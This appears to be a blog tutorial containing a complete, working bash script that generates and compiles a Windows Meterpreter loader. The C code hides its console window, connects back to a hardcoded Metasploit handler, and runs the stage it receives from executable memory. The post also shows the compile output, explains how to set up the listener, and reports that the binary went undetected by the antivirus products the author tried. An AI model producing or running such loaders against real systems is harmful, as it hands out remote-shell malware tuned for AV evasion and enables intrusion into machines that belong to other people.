meterpreter-loader for win targets

This may sound unnecessary, but I wanted to slightly improve an already well-made piece of code: the meterpreter-loader for Windows targets. Based on Raphael Mudge's work, I decided to write a small C source code generator that hardcodes the IP address and port number of our Metasploit handler into the loader. The original concept is very good; it just benefits from a little automation. The original article is here: blog.strategiccyber.com/2012/09/13/a-loader-for-metasploits-meterpreter/

The original source code on GitHub is here: github.com/rsmudge/metasploit-loader

My modifications are simple: the script writes the handler's IP and port into the generated source as hardcoded string variables, so that when the final binary is executed it silently connects to the Metasploit handler, reads the stage the handler sends (a 4-byte length followed by the stage code) and jumps to it — i.e. it runs your favorite Windows reverse_tcp Meterpreter stage. Note that the loader performs no authentication or integrity check on what it receives: whatever is listening at that IP and port can hand it arbitrary code to execute.

Let's get customizing!

Here is the code. You can place the shell script anywhere; just make sure you have mingw-w64 (the `i686-w64-mingw32-gcc` cross-compiler) installed on your Linux box.

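#!/bin/bash
# Generates a small C loader for Metasploit's windows reverse_tcp stage
# (after Raphael Mudge's metasploit-loader), with the handler's IP and port
# baked into the source, then cross-compiles it with mingw-w64.
#
# Usage:  ./mploadercreate.sh        (prompts for handler IP and port)
# Output: temp.c (generated source) and payload.exe (32-bit PE).
#
# The generated binary is an x86 (32-bit) loader: it prefixes the received
# stage with "mov edi, <socket>" (opcode 0xBF), which is how the x86
# reverse_tcp stage expects to receive its socket. Pair it with a 32-bit
# payload on the handler side.

clear
echo "****************************************************************"
echo "    Automatic C source code generator - FOR METASPLOIT          "
echo "           Based on rsmudge metasploit-loader                   "
echo "****************************************************************"
printf 'Metasploit server IP : '
read -r ip
printf 'Metasploit port number : '
read -r port

# Both values are spliced into C string literals. Restrict them to a safe
# character set so that quotes, semicolons or spaces cannot corrupt the
# generated source (or silently change what the loader connects to).
# Hostnames are allowed because the loader resolves with gethostbyname().
if ! [[ "$ip" =~ ^[A-Za-z0-9.-]+$ ]]; then
    echo "Invalid server address: '$ip'" >&2
    exit 1
fi
if ! [[ "$port" =~ ^[0-9]{1,5}$ ]] || [ "$port" -lt 1 ] || [ "$port" -gt 65535 ]; then
    echo "Invalid port number: '$port'" >&2
    exit 1
fi

# winsock2.h must be included before windows.h; the other way round
# windows.h pulls in the legacy winsock.h and mingw warns about it.
cat > temp.c <<'EOF'
#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <limits.h>

EOF

# Handler address and port, hardcoded so the binary needs no arguments.
printf 'static const char server[]  = "%s";\n' "$ip"   >> temp.c
printf 'static const char serverp[] = "%s";\n' "$port" >> temp.c

cat >> temp.c <<'EOF'

/* Length of the "mov edi, imm32" stub placed in front of the stage. */
enum { STUB_LEN = 5 };

/* Initialise Winsock 2.2; exit if ws2_32.dll cannot provide it.
 * WSAStartup() returns 0 on success and a positive error code otherwise,
 * so the check is "!= 0" (the original "< 0" could never trigger). */
static void winsock_init(void) {
    WSADATA wsaData;
    WORD wVersionRequested = MAKEWORD(2, 2);
    if (WSAStartup(wVersionRequested, &wsaData) != 0) {
        printf("ws2_32.dll is out of date.\n");
        WSACleanup();
        exit(1);
    }
}

/* Report an error, release the socket and Winsock, and exit. */
static void punt(SOCKET my_socket, const char *error) {
    printf("Bad things: %s\n", error);
    closesocket(my_socket);
    WSACleanup();
    exit(1);
}

/* Read exactly len bytes into buffer, or punt.
 * recv() returning 0 means the peer closed the connection; it must be
 * treated as an error, otherwise the loop would spin forever. */
static int recv_all(SOCKET my_socket, void *buffer, int len) {
    char *startb = buffer;
    int tret = 0;
    while (tret < len) {
        int nret = recv(my_socket, startb + tret, len - tret, 0);
        if (nret == SOCKET_ERROR || nret == 0)
            punt(my_socket, "Could not receive data");
        tret += nret;
    }
    return tret;
}

/* Connect to targetip:port over TCP (IPv4) and return the socket. */
static SOCKET wsconnect(const char *targetip, int port) {
    struct hostent *target;
    struct sockaddr_in sock;
    SOCKET my_socket = socket(AF_INET, SOCK_STREAM, 0);
    if (my_socket == INVALID_SOCKET)
        punt(my_socket, ".");
    target = gethostbyname(targetip);
    /* h_addr is copied into a 4-byte sin_addr; refuse anything else. */
    if (target == NULL || target->h_length != (int)sizeof(sock.sin_addr))
        punt(my_socket, "..");
    memset(&sock, 0, sizeof(sock));
    memcpy(&sock.sin_addr.s_addr, target->h_addr, target->h_length);
    sock.sin_family = AF_INET;
    sock.sin_port = htons((unsigned short)port);
    if (connect(my_socket, (struct sockaddr *)&sock, sizeof(sock)))
        punt(my_socket, "...");
    return my_socket;
}

int main(int argc, char *argv[]) {
    ULONG32 size;
    char *buffer;
    void (*function)(void);
    (void)argc;
    (void)argv;

    FreeConsole();  /* detach so no console window stays visible */
    winsock_init();
    SOCKET my_socket = wsconnect(server, atoi(serverp));

    /* The handler first sends the stage length as a 4-byte little-endian
     * integer, then the stage itself. There is no authentication or
     * integrity check: whoever answers at server:serverp controls what
     * this process executes next. Reject a zero length and anything that
     * would not fit recv_all()'s int length or overflow size + STUB_LEN. */
    recv_all(my_socket, &size, (int)sizeof(size));
    if (size == 0 || size > (ULONG32)INT_MAX - STUB_LEN)
        punt(my_socket, "read a strange or incomplete length value\n");

    /* Executable buffer: "mov edi, <socket>" (0xBF imm32) followed by the
     * stage. The reverse_tcp stage expects its socket in edi. This is
     * x86-32 only (the handle is copied as 4 bytes), matching the i686
     * cross-compile below. */
    buffer = VirtualAlloc(0, size + STUB_LEN, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (buffer == NULL)
        punt(my_socket, "could not allocate buffer\n");
    buffer[0] = (char)0xBF;
    memcpy(buffer + 1, &my_socket, 4);
    recv_all(my_socket, buffer + STUB_LEN, (int)size);
    function = (void (*)(void))buffer;
    function();
    return 0;
}
EOF

echo 'Compiling binary ..'
# i686 target only: the socket-in-edi stub generated above is x86-32 specific.
if ! i686-w64-mingw32-gcc temp.c -o payload.exe -lws2_32; then
    echo "Compilation failed; inspect temp.c" >&2
    exit 1
fi
ls -la payload.exe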
root@kali:~/htb# ./mploadercreate.sh 
****************************************************************
Automatic C source code generator - FOR METASPLOIT 
Based on rsmudge metasploit-loader 
****************************************************************
Metasploit server IP : 10.10.14.10
Metasploit port number : 443
Compiling binary ..
In file included from temp.c:4:
/usr/share/mingw-w64/include/winsock2.h:15:2: warning: #warning Please include winsock2.h before windows.h [-Wcpp]
#warning Please include winsock2.h before windows.h
^~~~~~~
-rwxr-xr-x 1 root root 292503 Jan 31 04:18 payload.exe
root@kali:~/htb# file payload.exe 
payload.exe: PE32 executable (console) Intel 80386, for MS Windows

Then start a listener in msfconsole with exploit/multi/handler, set it to your favorite reverse TCP payload — a 32-bit one such as windows/meterpreter/reverse_tcp, since payload.exe is a PE32 binary and the stub it prepends to the stage is x86-only — and set LHOST/LPORT to the values you entered. So far I have tested this on Win7 32-bit, Win7 64-bit, Win8 64-bit and Win10 64-bit, and at the time of writing it was not flagged by the AV products I tried; signatures change, so re-test against the target's AV before relying on it.

Reference used: https://astr0baby.wordpress.com/2013/10/17/customizing-custom-meterpreter-loader/

Enjoy…